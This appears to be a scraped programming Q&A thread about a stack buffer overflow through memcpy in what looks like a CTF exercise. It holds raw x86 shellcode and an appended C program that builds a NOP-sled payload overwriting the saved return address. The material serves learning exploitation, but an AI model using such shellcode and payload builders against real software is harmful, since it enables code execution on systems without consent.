get shell from memcpy

Time:12-04

I've been trying to get a shell from this function, but nothing seems to work.
So what's happening here is that I have a variable of size 32 bytes and I'm trying to copy 600 bytes to it.
What I don't understand is where my shellcode will be executed: inside the 32 bytes, or in the 600 - 32 bytes?
I can't give the whole working code, as this is just disassembled code from Ghidra.

Any help what should I do?
Thanks in advance.

#include <string.h>

void foo(void *param)
{
  char variable[32];               /* 32-byte stack buffer (Ghidra showed it as "undefined") */

  memcpy(variable, param, 600);    /* copies 600 bytes: 568 of them land past the end of the buffer */
  return;
}

This is the shellcode I tried:

\x31\xc0\x50\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x50\x68\x2e\x74\x78\x74\x68\x66\x6c\x61\x67\x89\xe1\x50\x51\x53\x89\xe1\x31\xc0\x83\xc0\x0b\xcd\x80

I was expecting that I would get a shell on the system if I just input the above shellcode, but all I get for now is segfaults.

I'm new to binary exploitation, so sorry if this is a stupid question, and sorry for my English.

CodePudding user response:

It looks like you're trying to overflow through the memcpy function. If you're reaching RIP, it must be filled with an address that you can execute. The classical technique is to have this address lower in the buffer; RIP is set to your payload by the return instruction at the end of the function.

You will need to deactivate modern features, which are address randomization and the non-executable stack. In case these protections are on on the system that you are testing, you have to use a technique that is called ROP, which means Return Oriented Payload.

This technique uses code already present in the program. Well, bits of this code: by filling the stack with addresses of instructions that end with "ret", you can come back to the stack and pick another instruction. This way you fill the registers as needed and then do a syscall.

You need to find links about these techniques.

CodePudding user response:

… where my shell code will be executed is it inside the 32bytes or in the 600 - 32 bytes.

The intent here is that the data from param will be copied into memory starting where variable is but going beyond that. Beyond that is data on the stack used to manage function calls, including the return address of the function. The idea is that carefully crafted data in param will put a new return address on the stack, and, when the foo function returns, program execution will jump to that new address.

Doing this requires particular knowledge about the program being attacked and the computing platform it executes on.

Any help what should I do?

Classroom exercises of this nature must be crafted specifically for the system the students are using. You must get the necessary information from your instructor.
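The layout both answers describe, as an added worked example that is not part of either answer or of the original post. It builds the 600-byte input that foo() copies, so that the saved return address is overwritten with a pointer back into the copied data, and shows the cyclic-pattern trick for measuring where that return address sits relative to `variable`. Everything it assumes is hypothetical: a 32-bit Linux target (which is what the posted `int 0x80` shellcode implies), an executable stack with ASLR off, and a buffer address of 0xffffd000 read from a debugger on the target. Decoding the posted bytes, the shellcode runs `execve("/bin/cat", {"/bin/cat", "flag.txt", NULL})` rather than spawning a shell, and it leaves EDX (envp) untouched. Because it is 40 bytes long it cannot sit inside the 32-byte buffer below the return address, so with a small offset the builder places it in the part of the 600 bytes that spills past the return address; where there is room below, it uses the classic layout and keeps a gap so the shellcode's own pushes do not overwrite its last instructions.

```c
/* Added example, not code from the original post. Hypothetical target:
 * 32-bit Linux, executable stack, ASLR off, buffer at 0xffffd000. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define INPUT_LEN 600   /* memcpy(variable, param, 600) in the decompiled foo() */
#define PUSH_ROOM 64    /* bytes below ESP the shellcode's own pushes may dirty */

/* The shellcode from the question. Decoded: pushes "/bin/cat" and
 * "flag.txt", builds argv, execve via int 0x80 (32-bit Linux). */
static const unsigned char shellcode[] =
    "\x31\xc0\x50\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3"
    "\x50\x68\x2e\x74\x78\x74\x68\x66\x6c\x61\x67\x89\xe1\x50\x51"
    "\x53\x89\xe1\x31\xc0\x83\xc0\x0b\xcd\x80";
#define SHELLCODE_LEN (sizeof(shellcode) - 1)   /* 40 bytes */

/* Step 1: a non-repeating pattern ("Aa0Aa1Aa2..."). Feed it to the
 * program; the 4 bytes in EIP at the crash identify the offset. */
void cyclic_pattern(unsigned char *out, size_t len)
{
    size_t i = 0;
    for (char a = 'A'; a <= 'Z' && i < len; a++)
        for (char b = 'a'; b <= 'z' && i < len; b++)
            for (char c = '0'; c <= '9' && i < len; c++) {
                const char chunk[3] = { a, b, c };
                for (int k = 0; k < 3 && i < len; k++)
                    out[i++] = (unsigned char)chunk[k];
            }
}

/* Little-endian 32-bit read: how x86 sees the bytes at off. */
uint32_t word_at(const unsigned char *p, size_t off)
{
    uint32_t v;
    memcpy(&v, p + off, 4);
    return v;
}

/* Offset of the saved return address = where the crashing EIP value
 * appears in the pattern. Returns -1 if it is not there. */
long cyclic_find(const unsigned char *pattern, size_t len, uint32_t eip)
{
    for (size_t off = 0; off + 4 <= len; off++)
        if (word_at(pattern, off) == eip) return (long)off;
    return -1;
}

/* Step 2: the real payload. With a small ret_offset (32-byte buffer,
 * 40-byte shellcode) the shellcode goes after the return address:
 *     [NOPs][ret][NOP sled][shellcode]
 * If there is room below it (plus PUSH_ROOM, since the shellcode pushes
 * onto the stack just below the slot it returned from), use the classic:
 *     [NOP sled][shellcode][NOPs][ret][NOPs]
 * ret points into the middle of the sled so a slightly wrong buffer
 * address still slides into the shellcode. Returns the shellcode's
 * offset in the payload, or -1 if it cannot be placed. */
int build_payload(unsigned char *out, size_t len, size_t ret_offset,
                  uint32_t buf_addr)
{
    if (ret_offset + 4 > len) return -1;
    memset(out, 0x90, len);                          /* NOP everywhere else */
    size_t sc_at, sled_start;
    if (ret_offset >= SHELLCODE_LEN + PUSH_ROOM) {   /* below the return address */
        sc_at = ret_offset - PUSH_ROOM - SHELLCODE_LEN;
        sled_start = 0;
    } else {                                         /* above it */
        sc_at = len - SHELLCODE_LEN;
        sled_start = ret_offset + 4;
        if (sc_at < sled_start) return -1;
    }
    memcpy(out + sc_at, shellcode, SHELLCODE_LEN);
    uint32_t target = buf_addr + (uint32_t)((sled_start + sc_at) / 2);
    memcpy(out + ret_offset, &target, 4);            /* new saved EIP, little-endian */
    return (int)sc_at;
}

/* ./build > pattern        emits the cyclic pattern for the crash run
 * ./build 36 > payload     emits the payload once cyclic_find said 36 */
int main(int argc, char **argv)
{
    unsigned char buf[INPUT_LEN];
    if (argc < 2) {
        cyclic_pattern(buf, INPUT_LEN);
    } else {
        long off = strtol(argv[1], NULL, 0);
        if (off < 0 || build_payload(buf, INPUT_LEN, (size_t)off, 0xffffd000u) < 0) {
            fprintf(stderr, "cannot place shellcode with ret at %ld\n", off);
            return 1;
        }
        fprintf(stderr, "ret at %ld -> 0x%08x\n", off, word_at(buf, (size_t)off));
    }
    fwrite(buf, 1, INPUT_LEN, stdout);
    return 0;
}
```

The pattern run is what answers the question's "inside the 32 bytes or in the 600 - 32 bytes": the distance from `variable` to the saved return address (the "32 + saved frame pointer + alignment" figure answer 2 refers to) has to be measured on the real binary, and only then does the builder know whether the shellcode lands before or after the overwritten return address. None of this runs without the protections answer 1 lists being off; with NX or ASLR on, the same offset feeds a ROP chain instead of a pointer into the buffer.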
